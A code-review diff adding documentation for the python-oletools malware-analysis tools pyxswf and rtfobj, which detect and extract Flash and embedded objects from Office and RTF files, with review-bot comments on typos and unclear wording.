  62 +<li><a href="Home.html">Home</a></li>
  63 +<li><a href="License.html">License</a></li>
  64 +<li><a href="Install.html">Install</a></li>
  65 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  66 +<li>Tools:
  67 +<ul>
  68 +<li><a href="olebrowse.html">olebrowse</a></li>
  69 +<li><a href="oleid.html">oleid</a></li>
  70 +<li><a href="olemeta.html">olemeta</a></li>
  71 +<li><a href="oletimes.html">oletimes</a></li>
  72 +<li><a href="olevba.html">olevba</a></li>
  73 +<li><a href="pyxswf.html">pyxswf</a></li>
  74 +<li><a href="rtfobj.html">rtfobj</a></li>
  75 +</ul></li>
  76 +</ul>
  77 +</body>
  78 +</html>
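Review bot: In Example 2 the `[SUMMARY]` line is broken across lines 53 and 54, so the object name reads as `RTF_embedded_object_0` followed by a stray `00036DD`. This looks like a console wrap captured in the paste. Line 52 gives the index as 000036DD, so the name should be shown unbroken on a single line. Otherwise a reader searching for the object name will not find it.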
... ...
oletools/doc/pyxswf.md 0 → 100644
  1 +pyxswf
  2 +======
  3 +
  4 +pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may
  5 +be embedded in files such as MS Office documents (e.g. Word, Excel),
  6 +which is especially useful for malware analysis.
  7 +
  8 +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
  9 +
  10 +pyxswf is an extension to [xxxswf.py](http://hooked-on-mnemonics.blogspot.nl/2011/12/xxxswfpy.html) published by Alexander Hanel.
  11 +
  12 +Compared to xxxswf, it can extract streams from MS Office documents by parsing
  13 +their OLE structure properly, which is necessary when streams are fragmented.
  14 +Stream fragmentation is a known obfuscation technique, as explained on
  15 +[http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/](http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/)
  16 +
  17 +It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option).
  18 +
  19 +For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files.
  20 +
  21 +## Usage
  22 +
  23 + :::text
  24 + Usage: pyxswf.py [options] <file.bad>
  25 +
  26 + Options:
  27 + -o, --ole Parse an OLE file (e.g. Word, Excel) to look for SWF
  28 + in each stream
  29 + -f, --rtf Parse an RTF file to look for SWF in each embedded
  30 + object
  31 + -x, --extract Extracts the embedded SWF(s), names it MD5HASH.swf &
  32 + saves it in the working dir. No addition args needed
  33 + -h, --help show this help message and exit
  34 + -y, --yara Scans the SWF(s) with yara. If the SWF(s) is
  35 + compressed it will be deflated. No addition args
  36 + needed
  37 + -s, --md5scan Scans the SWF(s) for MD5 signatures. Please see func
  38 + checkMD5 to define hashes. No addition args needed
  39 + -H, --header Displays the SWFs file header. No addition args needed
  40 + -d, --decompress Deflates compressed SWFS(s)
  41 + -r PATH, --recdir=PATH
  42 + Will recursively scan a directory for files that
  43 + contain SWFs. Must provide path in quotes
  44 + -c, --compress Compresses the SWF using Zlib
  45 +
  46 +### Example 1 - detecting and extracting a SWF file from a Word document on Windows:
  47 +
  48 + :::text
  49 + C:\oletools>pyxswf.py -o word_flash.doc
  50 + OLE stream: 'Contents'
  51 + [SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
  52 + [ADDR] SWF 1 at 0x8 - FWS Header
  53 +
  54 + C:\oletools>pyxswf.py -xo word_flash.doc
  55 + OLE stream: 'Contents'
  56 + [SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
  57 + [ADDR] SWF 1 at 0x8 - FWS Header
  58 + [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
  59 +
  60 +### Example 2 - detecting and extracting a SWF file from a RTF document on Windows:
  61 +
  62 + :::text
  63 + C:\oletools>pyxswf.py -xf "rtf_flash.rtf"
  64 + RTF embedded object size 1498557 at index 000036DD
  65 + [SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0
  66 + 00036DD
  67 + [ADDR] SWF 1 at 0xc40 - FWS Header
  68 + [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
  69 +
  70 +
  71 +
  72 +## How to use pyxswf in Python applications
  73 +
  74 +TODO
  75 +
  76 +--------------------------------------------------------------------------
  77 +
  78 +python-oletools documentation
  79 +-----------------------------
  80 +
  81 +- [[Home]]
  82 +- [[License]]
  83 +- [[Install]]
  84 +- [[Contribute]], Suggest Improvements or Report Issues
  85 +- Tools:
  86 + - [[olebrowse]]
  87 + - [[oleid]]
  88 + - [[olemeta]]
  89 + - [[oletimes]]
  90 + - [[olevba]]
  91 + - [[pyxswf]]
  92 + - [[rtfobj]]
0 93 \ No newline at end of file
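Review bot: The paragraph on line 19 opens with "For this", but it follows the RTF paragraph on line 17 while mostly describing the `-o` option for OLE streams, so the referent is unclear and `-f` ends up explained twice. Reorder so the option sentence follows the OLE paragraph on lines 12 to 15, or reword it to stand alone, for example "Use the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files."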
... ...
oletools/doc/rtfobj.html 0 → 100644
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="rtfobj">rtfobj</h1>
  11 +<p>rtfobj is a Python module to extract embedded objects from RTF files, such as OLE ojects. It can be used as a Python library or a command-line tool.</p>
  12 +<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
  13 +<h2 id="usage">Usage</h2>
  14 +<pre><code>rtfobj.py &lt;file.rtf&gt;</code></pre>
  15 +<p>It extracts and decodes all the data blocks encoded as hexadecimal in the RTF document, and saves them as files named &quot;object_xxxx.bin&quot;, xxxx being the location of the object in the RTF file.</p>
  16 +<h2 id="how-to-use-rtfobj-in-python-applications">How to use rtfobj in Python applications</h2>
  17 +<p>Usage as a python module:</p>
  18 +<p>rtf_iter_objects(filename) is an iterator which yields a tuple (index, object) providing the index of each hexadecimal stream in the RTF file, and the corresponding decoded object.</p>
  19 +<p>Example:</p>
  20 +<pre><code>import rtfobj
  21 +for index, data in rtfobj.rtf_iter_objects(&quot;myfile.rtf&quot;):
  22 + print &#39;found object size %d at index %08X&#39; % (len(data), index)</code></pre>
  23 +<hr />
  24 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  25 +<ul>
  26 +<li><a href="Home.html">Home</a></li>
  27 +<li><a href="License.html">License</a></li>
  28 +<li><a href="Install.html">Install</a></li>
  29 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  30 +<li>Tools:
  31 +<ul>
  32 +<li><a href="olebrowse.html">olebrowse</a></li>
  33 +<li><a href="oleid.html">oleid</a></li>
  34 +<li><a href="olemeta.html">olemeta</a></li>
  35 +<li><a href="oletimes.html">oletimes</a></li>
  36 +<li><a href="olevba.html">olevba</a></li>
  37 +<li><a href="pyxswf.html">pyxswf</a></li>
  38 +<li><a href="rtfobj.html">rtfobj</a></li>
  39 +</ul></li>
  40 +</ul>
  41 +</body>
  42 +</html>
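Review bot: Line 15 says the output files are named "object_xxxx.bin" with xxxx "being the location of the object in the RTF file", but not how that location is written or where the files are saved. The Python example on line 22 prints the index as `%08X`, which suggests hexadecimal, yet the file-name format is left to guesswork. State the number format and the output directory. It is also worth saying that the saved files are content extracted from an untrusted document.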
... ...
oletools/doc/rtfobj.md 0 → 100644
  1 +rtfobj
  2 +======
  3 +
  4 +rtfobj is a Python module to extract embedded objects from RTF files, such as
  5 +OLE ojects. It can be used as a Python library or a command-line tool.
  6 +
  7 +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
  8 +
  9 +## Usage
  10 +
  11 + :::text
  12 + rtfobj.py <file.rtf>
  13 +
  14 +It extracts and decodes all the data blocks encoded as hexadecimal in the RTF document, and saves them as files named "object_xxxx.bin", xxxx being the location of the object in the RTF file.
  15 +
  16 +
  17 +
  18 +## How to use rtfobj in Python applications
  19 +
  20 +Usage as a python module:
  21 +
  22 +rtf_iter_objects(filename) is an iterator which yields a tuple (index, object) providing the index of each hexadecimal stream in the RTF file, and the corresponding decoded object.
  23 +
  24 +Example:
  25 +
  26 + :::python
  27 + import rtfobj
  28 + for index, data in rtfobj.rtf_iter_objects("myfile.rtf"):
  29 + print 'found object size %d at index %08X' % (len(data), index)
  30 +
  31 +--------------------------------------------------------------------------
  32 +
  33 +python-oletools documentation
  34 +-----------------------------
  35 +
  36 +- [[Home]]
  37 +- [[License]]
  38 +- [[Install]]
  39 +- [[Contribute]], Suggest Improvements or Report Issues
  40 +- Tools:
  41 + - [[olebrowse]]
  42 + - [[oleid]]
  43 + - [[olemeta]]
  44 + - [[oletimes]]
  45 + - [[olevba]]
  46 + - [[pyxswf]]
  47 + - [[rtfobj]]
0 48 \ No newline at end of file
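Review bot: Line 5 has a typo, "OLE ojects", which should be "OLE objects". The same text appears on line 11 of rtfobj.html, so fix it here in the source and regenerate the HTML rather than patching both copies by hand.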
... ...